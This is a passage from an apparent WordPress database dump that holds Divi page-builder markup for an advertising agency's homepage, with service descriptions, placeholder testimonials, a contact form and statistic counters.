custom_padding__hover=\"|||\" saved_specialty_column_type=\"1_2\"][et_pb_blurb title=\"03. EXECUTION\" use_icon=\"on\" font_icon=\"%%57%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"48px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_margin=\"||26px|||\" animation_style=\"fade\" animation_direction=\"bottom\"]<div><span>Creative Development, Setting up the visual identity, implementing the IMC(Integrated Marketing Communication)</span></div>[/et_pb_blurb][/et_pb_column_inner][et_pb_column_inner type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\" saved_specialty_column_type=\"1_2\"][et_pb_blurb title=\"04. EVALUATION\" use_icon=\"on\" font_icon=\"%%369%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"48px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" width=\"98.9%\" custom_margin=\"||43px||false|false\" custom_padding=\"||||false|false\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"20%\"]<div dir=\"ltr\"><span>The fourth but the most important step is evaluation, adaptation and reporting. To improvise future performance.</span></div>\n<p><span></span></p>[/et_pb_blurb][/et_pb_column_inner][/et_pb_row_inner][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" padding_top__hover=\"0px\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/home-office-06.jpg\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" custom_margin=\"|||\" custom_padding=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"6%\" animation_starting_opacity=\"100%\"][/et_pb_image][/et_pb_column][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Testimonial Section\" _builder_version=\"3.22\" custom_margin=\"|||\" custom_padding=\"110px||110px|\"][et_pb_row admin_label=\"Testimonial Title\" _builder_version=\"3.25\" custom_margin=\"|||\" animation_style=\"fade\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.27.4\" text_font=\"Montserrat|on||on|\" text_text_color=\"#353740\" text_font_size=\"42px\" text_line_height=\"1.2em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\"]<p>From Our Clients</p>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" text_orientation=\"center\" max_width=\"600px\" module_alignment=\"center\" custom_margin=\"|||\"]Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit laborum. Sed ut perspiciatis unde omnis.\r[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_2,1_2\" admin_label=\"Testimonial\" _builder_version=\"3.25\" custom_padding=\"|||\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_testimonial author=\"Mitch Skolnik\" job_title=\"operation Director\" company_name=\"Elegant Themes\" portrait_url=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/portraits-circle-small_1.png\" quote_icon=\"off\" _builder_version=\"3.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"left\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][et_pb_testimonial author=\"Andrel Nahaev\" job_title=\"operation Director\" company_name=\"Elegant Themes\" portrait_url=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/portraits-circle-small_3.png\" quote_icon=\"off\" _builder_version=\"3.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"left\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_testimonial author=\"Eduard Ungureanu\" job_title=\"Tech Support\" company_name=\"Elegant Themes\" portrait_url=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/portraits-circle-small_2.png\" quote_icon=\"off\" _builder_version=\"3.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][et_pb_testimonial author=\"Tom Ewer\" job_title=\"Blogger\" company_name=\"Elegant Themes\" portrait_url=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/portraits-circle-small_5.png\" quote_icon=\"off\" _builder_version=\"3.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Contact Form Section\" _builder_version=\"3.22\" background_color=\"#fcd21d\" custom_padding=\"110px||110px|\" animation_style=\"zoom\" animation_direction=\"bottom\" animation_intensity_zoom=\"10%\" saved_tabs=\"all\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" locked=\"off\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Let\'s Start Something new<br /><span style=\"color: #FFF;\">Say Hello!</span></h2>\r[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#353740\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p>Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit laborum. Sed ut perspiciatis unde omnis.</p>\r[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row admin_label=\"Contact Form\" _builder_version=\"3.25\" animation_style=\"fade\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_contact_form captcha=\"off\" submit_button_text=\"Send\" module_id=\"et_pb_contact_form_0\" _builder_version=\"3.23\" form_field_background_color=\"rgba(255,255,255,0)\" form_field_text_color=\"#353740\" form_field_font=\"Montserrat||||\" form_field_font_size=\"16px\" custom_button=\"on\" button_text_color=\"#ffffff\" button_border_width=\"5px\" button_border_color=\"#ffffff\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#ffffff\" max_width=\"800px\" module_alignment=\"center\" animation_style=\"fade\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"-1px\" box_shadow_color=\"rgba(0,0,0,0.18)\" form_background_color=\"rgba(255,255,255,0)\" button_text_color_hover=\"#ffffff\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_border_color_hover=\"#ffffff\" button_letter_spacing_hover=\"2px\"][et_pb_contact_field field_id=\"Name\" field_title=\"Name\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Email\" field_title=\"Email Address\" field_type=\"email\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Company\" field_title=\"Company Name\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Message\" field_title=\"Message\" field_type=\"text\" fullwidth_field=\"on\" _builder_version=\"3.16\" custom_margin=\"||60px|\" custom_padding=\"|||\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][/et_pb_contact_form][/et_pb_column][/et_pb_row][/et_pb_section]','Home New','','inherit','closed','closed','','564-revision-v1','','','2020-08-07 20:28:22','2020-08-07 20:28:22','',564,'https://wthtest1.in8.cdn-alpha.com/2020/08/07/564-revision-v1/',0,'revision','',0),(623,1,'2020-08-07 20:28:46','2020-08-07 20:28:46','[et_pb_section fb_built=\"1\" admin_label=\"Hero\" _builder_version=\"3.22\" custom_padding=\"0px|0px|0px|0px\" animation_style=\"zoom\" animation_intensity_zoom=\"4%\" hover_enabled=\"0\"][et_pb_row use_custom_gutter=\"on\" gutter_width=\"1\" make_equal=\"on\" module_class=\" et_pb_row_fullwidth\" _builder_version=\"4.5.2\" background_color=\"#fcd21d\" background_image=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/banner.jpg\" width=\"100%\" width_tablet=\"100%\" width_phone=\"\" width_last_edited=\"on|desktop\" max_width=\"100%\" max_width_tablet=\"100%\" max_width_phone=\"\" max_width_last_edited=\"on|desktop\" custom_padding=\"0px||0px|\" animation_style=\"slide\" animation_direction=\"top\" animation_intensity_slide=\"3%\" hover_enabled=\"0\" make_fullwidth=\"on\" alt=\"Main Banner WhatTheHell?\" title_text=\"main banner \"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"10%|8%|10%|8%\" custom_padding__hover=\"|||\"][et_pb_text content_tablet=\"\" content_phone=\"<h1 style=%22text-align: center;%22><span style=%22color: #ffffff;%22>Welcome to</span><br /> <span style=%22color: #ffffff;%22> Advertising</span></h1>\n\" content_last_edited=\"on|phone\" _builder_version=\"4.4.9\" text_font=\"||||||||\" text_font_size=\"18px\" header_font=\"Montserrat|700||on|||||\" header_text_color=\"#f7f7f7\" header_font_size=\"76px\" header_line_height=\"1.3em\" custom_margin=\"6px||40px|||\" animation_style=\"zoom\" animation_duration=\"1200ms\" text_font_tablet=\"\" text_font_phone=\"\" text_font_last_edited=\"on|phone\" text_font_size_tablet=\"\" text_font_size_phone=\"12px\" text_font_size_last_edited=\"on|phone\" header_font_size_tablet=\"64px\" header_font_size_phone=\"40px\" header_font_size_last_edited=\"on|phone\" text_text_shadow_style=\"preset1\" global_module=\"569\" locked=\"off\"]<h1 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Welcome to</span><br /> <span style=\"color: #ffffff;\"> Advertising</span></h1>\n[/et_pb_text][et_pb_button button_text=\"Learn More\" _builder_version=\"4.5.2\" custom_button=\"on\" button_text_color=\"#ffffff\" button_border_width=\"4px\" button_border_color=\"#ffffff\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" animation_style=\"fade\" hover_enabled=\"0\" button_text_color_hover=\"#ffffff\" button_border_color_hover=\"#ffffff\" button_letter_spacing_hover=\"2px\" button_bg_color_hover=\"rgba(0,0,0,0)\" locked=\"off\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#ffffff\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"on\" button_border_color__hover=\"#ffffff\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"on\" button_letter_spacing__hover=\"2px\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\" button_alignment=\"center\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Service Section\" _builder_version=\"3.22\" custom_margin=\"|||\" custom_padding=\"110px||110px|\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>What we do</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.5.2\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\" hover_enabled=\"0\"]<p><span>WhatTheHell? is not some advertising, digital and design agency. An irreverent ideas farm seems more like it.</span></p>\n[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" use_custom_gutter=\"on\" gutter_width=\"2\" make_equal=\"on\" admin_label=\"Services\" _builder_version=\"3.25\" max_width=\"80%\" custom_padding=\"25px||25px|\" use_custom_width=\"on\" width_unit=\"off\"][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Creative\" use_icon=\"on\" font_icon=\"%%74%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.5.2\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" hover_enabled=\"0\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>It is important for the creative process and our lives. A key component of visual marketing to let businesses succeed.</span></p>\n[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Media\" use_icon=\"on\" font_icon=\"%%103%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.5.2\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"100ms\" hover_enabled=\"0\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Strategically using new age media and creating a media mix effectively to evolve a sales funnel or brand awareness to engagement.</span></p>\n[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Digital\" use_icon=\"on\" font_icon=\"%%107%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.5.2\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"200ms\" hover_enabled=\"0\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Digital has emerged as one of the efficient media, there is no spill over with the help of professional targeting &amp; even individual targeting is possible.</span></p>\n[/et_pb_blurb][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" use_custom_gutter=\"on\" gutter_width=\"2\" make_equal=\"on\" admin_label=\"Services\" _builder_version=\"3.25\" max_width=\"80%\" custom_padding=\"25px||25px|\" use_custom_width=\"on\" width_unit=\"off\"][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Business Strategy\" use_icon=\"on\" font_icon=\"%%101%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.5.2\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" hover_enabled=\"0\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Gaining the competitive edge with Integrated Marketing Communications (IMC) or building product marketing strategy / Go to market strategy, We are in.</span></p>\n[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Web Design\" use_icon=\"on\" font_icon=\"%%106%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.5.2\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"100ms\" hover_enabled=\"0\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p>Online presence of any brand/product/service starts with a well defined and clearly communicated website. Website is the key and elementry step for any advertising campaign. So be ready to a bolder start.</p>\n[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Design/Video/Photo\" use_icon=\"on\" font_icon=\"%%108%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.5.2\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"200ms\" hover_enabled=\"0\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Design is not Art, Art is about the Artist, &amp; Design is about the user. Blending &amp; Balancing Art, Design, Copy &amp; Business Objective is what we do.</span></p>\n[/et_pb_blurb][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Video Section\" _builder_version=\"4.5.2\" use_background_color_gradient=\"on\" background_color_gradient_start=\"#ffffff\" background_color_gradient_end=\"#d4b068\" background_color_gradient_start_position=\"65%\" background_color_gradient_end_position=\"65%\" custom_padding=\"|||\" hover_enabled=\"0\"][et_pb_row admin_label=\"Video\" _builder_version=\"3.25\" custom_padding=\"0px|0px|0px|0px\" animation_style=\"slide\" animation_direction=\"top\" animation_intensity_slide=\"4%\" animation_starting_opacity=\"100%\" box_shadow_style=\"preset1\" box_shadow_blur=\"77px\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_video src=\"https://www.youtube.com/watch?v=f47r43eO6BU\" image_src=\"//i.ytimg.com/vi/f47r43eO6BU/hqdefault.jpg\" _builder_version=\"4.5.2\" animation_direction=\"bottom\" hover_enabled=\"0\" box_shadow_style=\"preset5\" box_shadow_vertical=\"0px\" box_shadow_spread=\"20px\" box_shadow_color=\"#ffffff\" thumbnail_overlay_color=\"rgba(0,0,0,0.6)\"][/et_pb_video][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Fun Fact Section\" _builder_version=\"4.5.2\" background_color=\"#d4b068\" custom_margin=\"|||\" custom_padding=\"60px||110px|\" hover_enabled=\"0\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"4.5.2\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\" hover_enabled=\"0\"]<h2><span style=\"color: #ffffff;\">Generating New Ideas. Solving real Problems</span></h2>\n[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.5.2\" text_font=\"Montserrat||||\" text_text_color=\"#353740\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\" hover_enabled=\"0\"]<p>Ideas are relevant if it has power to solve the real problem at hand. We are always keen on working practical ideas in the realtime business atmosphere.</p>\n[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_4,1_4,1_4,1_4\" admin_label=\"Fun Fact\" _builder_version=\"3.25\" custom_margin=\"|||\" custom_padding=\"40px||40px|\" animation_style=\"zoom\" animation_direction=\"top\" animation_intensity_zoom=\"10%\"][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Projects\" number=\"350\" percent_sign=\"off\" _builder_version=\"4.5.2\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\" hover_enabled=\"0\"][/et_pb_number_counter][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Satisfied Clients\" number=\"62\" percent_sign=\"off\" _builder_version=\"4.5.2\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\" animation_delay=\"100ms\" hover_enabled=\"0\"][/et_pb_number_counter][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Ongoing Projects\" number=\"16\" percent_sign=\"off\" _builder_version=\"4.5.2\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\" animation_delay=\"200ms\" hover_enabled=\"0\"][/et_pb_number_counter][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Cups Of Coffee\" number=\"906\" percent_sign=\"off\" _builder_version=\"4.5.2\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\" animation_delay=\"300ms\" 